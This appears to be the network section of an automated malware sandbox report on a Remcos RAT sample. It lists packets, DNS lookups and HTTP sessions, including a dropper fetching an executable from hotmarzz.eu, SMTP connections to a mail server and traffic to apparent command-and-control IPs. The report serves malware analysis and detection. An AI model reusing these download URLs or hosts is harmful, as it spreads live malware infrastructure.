                                                                                              Dec 7, 2021 13:40:36.784158945 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.784730911 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.785015106 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.785310984 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.785631895 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.785926104 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.786386013 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.939872980 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.939929008 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.940116882 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.940370083 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.940386057 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.940440893 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.940896034 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.940968037 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941083908 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.941117048 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941131115 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941430092 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941479921 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.941531897 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941647053 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.941683054 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941695929 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941883087 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941915989 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.941972971 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942085028 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.942116022 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942135096 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942234993 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942770958 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.942838907 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942874908 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.942910910 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942925930 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943253994 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.943295956 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943331003 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943543911 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943605900 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.943665028 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943895102 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.943931103 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943950891 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943957090 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.944251060 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.944313049 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.944328070 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.098161936 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.098267078 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.098299980 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.098321915 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.098392963 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.098402977 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.098973989 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.099004984 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.099078894 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.099118948 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.099342108 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.099423885 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.099442959 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.099600077 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.099703074 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.099853039 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.100281000 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.100325108 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.100353956 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.100377083 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.100379944 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.100397110 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.100405931 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.100405931 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.100467920 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.100490093 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.100496054 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.100754023 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.100845098 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.101234913 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.101263046 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.101305008 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.101315975 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.101327896 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.101506948 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.101586103 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.101604939 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.101691961 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.101758957 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.101821899 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.101896048 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.101907015 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.101973057 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.102042913 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.102097988 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.102358103 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.102385044 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.102435112 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.102463961 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.102473974 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.256324053 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.256342888 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.256434917 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.256490946 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.256670952 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.257067919 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.257174969 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.257266998 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.257343054 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.257343054 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.257356882 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.258416891 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.258507013 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.258604050 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.258722067 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.258759975 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.258867979 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.258954048 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.259073973 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.259197950 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.259247065 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.259259939 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.259315968 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.259351015 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.259387970 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.259511948 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.259516954 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.259629011 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.259721041 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.259736061 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.259851933 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.260077953 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.260529041 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.414608955 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.414632082 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.414798975 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.415584087 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.415618896 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.416975021 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.417284966 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.417299986 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.417350054 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.417742968 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.426316977 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.473615885 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:41.834780931 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:42.000588894 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.000762939 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:42.001135111 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:42.166224003 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.166346073 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.166866064 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:42.332211971 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.332242012 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.334928036 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.335180044 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:42.500243902 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.500710011 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.500982046 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:42.666111946 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.667258024 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.667488098 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:42.832567930 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.833667994 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:42.834007978 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:42.999500990 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:43.002449989 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:43.002882004 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:43.168009996 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:43.171422005 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:43.171713114 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:43.336880922 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:43.360510111 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:43.360821009 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:43.527056932 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:43.527890921 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:43.528115988 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:43.693341970 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:43.694669962 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:43.860169888 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:43.867223978 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:43.869029045 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:43.869256020 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:44.034595966 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:44.034620047 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:44.034862041 CET4654978366.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:44.034957886 CET49783465192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:44.068356991 CET4972780192.168.2.4195.110.124.154
                                                                                              Dec 7, 2021 13:40:44.552278042 CET4972780192.168.2.4195.110.124.154
                                                                                              Dec 7, 2021 13:40:45.240288973 CET4972780192.168.2.4195.110.124.154
                                                                                              Dec 7, 2021 13:40:45.587271929 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:40:45.589112997 CET497289090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:40:45.933186054 CET909049728185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:40:46.552508116 CET4972780192.168.2.4195.110.124.154
                                                                                              Dec 7, 2021 13:40:49.052675962 CET4972780192.168.2.4195.110.124.154
                                                                                              Dec 7, 2021 13:40:52.878946066 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:40:52.880861044 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:40:53.204622030 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:40:53.225488901 CET4973880192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:40:53.537436008 CET4973880192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:40:53.865715027 CET4972780192.168.2.4195.110.124.154
                                                                                              Dec 7, 2021 13:40:54.146833897 CET4973880192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:40:55.350080967 CET4973880192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:40:57.756505013 CET4973880192.168.2.481.88.52.165

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 7, 2021 13:38:54.419747114 CET5912353192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:38:54.454328060 CET53591238.8.8.8192.168.2.4
                                                                                              Dec 7, 2021 13:39:04.555217981 CET5453153192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:39:04.588227034 CET53545318.8.8.8192.168.2.4
                                                                                              Dec 7, 2021 13:40:08.350580931 CET5309753192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:40:08.374262094 CET53530978.8.8.8192.168.2.4
                                                                                              Dec 7, 2021 13:40:10.723212957 CET4925753192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:40:10.744484901 CET53492578.8.8.8192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.189601898 CET6238953192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:40:12.210922956 CET53623898.8.8.8192.168.2.4
                                                                                              Dec 7, 2021 13:40:12.949274063 CET4991053192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:40:12.969023943 CET53499108.8.8.8192.168.2.4
                                                                                              Dec 7, 2021 13:40:13.445142031 CET5585453192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:40:13.468687057 CET53558548.8.8.8192.168.2.4
                                                                                              Dec 7, 2021 13:40:15.629826069 CET6454953192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:40:15.649581909 CET53645498.8.8.8192.168.2.4
                                                                                              Dec 7, 2021 13:40:19.139693022 CET6315353192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:40:19.159317970 CET53631538.8.8.8192.168.2.4
                                                                                              Dec 7, 2021 13:40:24.461853981 CET5370053192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:40:24.483339071 CET53537008.8.8.8192.168.2.4
                                                                                              Dec 7, 2021 13:40:29.888415098 CET5172653192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:40:29.906827927 CET53517268.8.8.8192.168.2.4
                                                                                              Dec 7, 2021 13:40:34.969656944 CET5653453192.168.2.48.8.8.8
                                                                                              Dec 7, 2021 13:40:34.990272045 CET53565348.8.8.8192.168.2.4

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                              Dec 7, 2021 13:38:54.419747114 CET192.168.2.48.8.8.80x7c22Standard query (0)hotmarzz.euA (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:39:04.555217981 CET192.168.2.48.8.8.80x9640Standard query (0)hotmarzz.euA (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:08.350580931 CET192.168.2.48.8.8.80xdb86Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:10.723212957 CET192.168.2.48.8.8.80xc113Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:12.189601898 CET192.168.2.48.8.8.80xdbfbStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:12.949274063 CET192.168.2.48.8.8.80xf725Standard query (0)216.47.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:13.445142031 CET192.168.2.48.8.8.80xbe78Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:15.629826069 CET192.168.2.48.8.8.80x520fStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:19.139693022 CET192.168.2.48.8.8.80x6d84Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:24.461853981 CET192.168.2.48.8.8.80xb537Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:29.888415098 CET192.168.2.48.8.8.80xde1bStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:34.969656944 CET192.168.2.48.8.8.80xca5cStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                              Dec 7, 2021 13:38:51.444931984 CET8.8.8.8192.168.2.40x52b2No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                              Dec 7, 2021 13:38:54.454328060 CET8.8.8.8192.168.2.40x7c22No error (0)hotmarzz.eu195.110.124.154A (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:39:04.588227034 CET8.8.8.8192.168.2.40x9640No error (0)hotmarzz.eu81.88.52.165A (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:08.374262094 CET8.8.8.8192.168.2.40xdb86No error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:10.744484901 CET8.8.8.8192.168.2.40xc113No error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:12.210922956 CET8.8.8.8192.168.2.40xdbfbNo error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:12.969023943 CET8.8.8.8192.168.2.40xf725Name error (3)216.47.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:13.468687057 CET8.8.8.8192.168.2.40xbe78No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:13.468687057 CET8.8.8.8192.168.2.40xbe78No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:15.649581909 CET8.8.8.8192.168.2.40x520fNo error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:19.159317970 CET8.8.8.8192.168.2.40x6d84No error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:24.483339071 CET8.8.8.8192.168.2.40xb537No error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:29.906827927 CET8.8.8.8192.168.2.40xde1bNo error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)
                                                                                              Dec 7, 2021 13:40:34.990272045 CET8.8.8.8192.168.2.40xca5cNo error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)

                                                                                              HTTP Request Dependency Graph

                                                                                              • hotmarzz.eu
                                                                                              • whatismyipaddress.com

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.44973981.88.52.165443C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              TimestampkBytes transferredDirectionData


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.449727195.110.124.15480C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 7, 2021 13:38:54.534826040 CET417OUTGET /goods/Droppertodownloa.exe HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                              Host: hotmarzz.eu
                                                                                              Connection: Keep-Alive
                                                                                              Dec 7, 2021 13:38:54.593884945 CET418INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 07 Dec 2021 12:38:54 GMT
                                                                                              Server: Apache
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Length: 192
                                                                                              Keep-Alive: timeout=2, max=90
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 51 43 b9 d9 42 1e 91 04 91 98 a5 b0 c4 ec 28 26 c8 e0 ee 22 fa f7 82 36 96 f7 31 e7 8e 58 c4 87 48 9d ca 04 76 6a 9f 43 59 6d f3 2c 02 7f 89 98 25 2a 45 8c 55 fc 4b 36 c1 0a 31 29 7c e9 89 c6 dd 5b 29 1a aa f5 24 dc cd b5 24 c3 55 08 05 3b 48 79 e8 b4 c0 9f e9 09 fc 96 c4 99 f5 7b be 5b cb bf ce a4 3c d1 4b d5 10 18 7a 0c 64 1d 69 a8 8e 39 e0 95 59 5b 8c 0d f7 3d 19 c7 9a c7 ae e5 3a a0 17 c1 58 5b e8 26 c6 65 66 00 77 e0 9a 9b 05 4b e6 49 26 10 d8 cf 9b df b5 89 3f 7f e9 7d 00 4f bd 26 5b e0 00 00 00
                                                                                              Data Ascii: M@E{bQCB(&"61XHvjCYm,%*EUK61)|[)$$U;Hy{[<Kzdi9Y[=:X[&efwKI&?}O&[


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.44973881.88.52.16580C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 7, 2021 13:39:04.706928015 CET1339OUTGET /goods/Droppertodownloa.exe HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                              Host: hotmarzz.eu
                                                                                              Connection: Keep-Alive
                                                                                              Dec 7, 2021 13:39:04.766505957 CET1340INHTTP/1.1 302 Found
                                                                                              Date: Tue, 07 Dec 2021 12:39:04 GMT
                                                                                              Server: Apache
                                                                                              Location: https://hotmarzz.eu/goods/Droppertodownloa.exe
                                                                                              Content-Length: 230
                                                                                              Keep-Alive: timeout=5, max=150
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=iso-8859-1
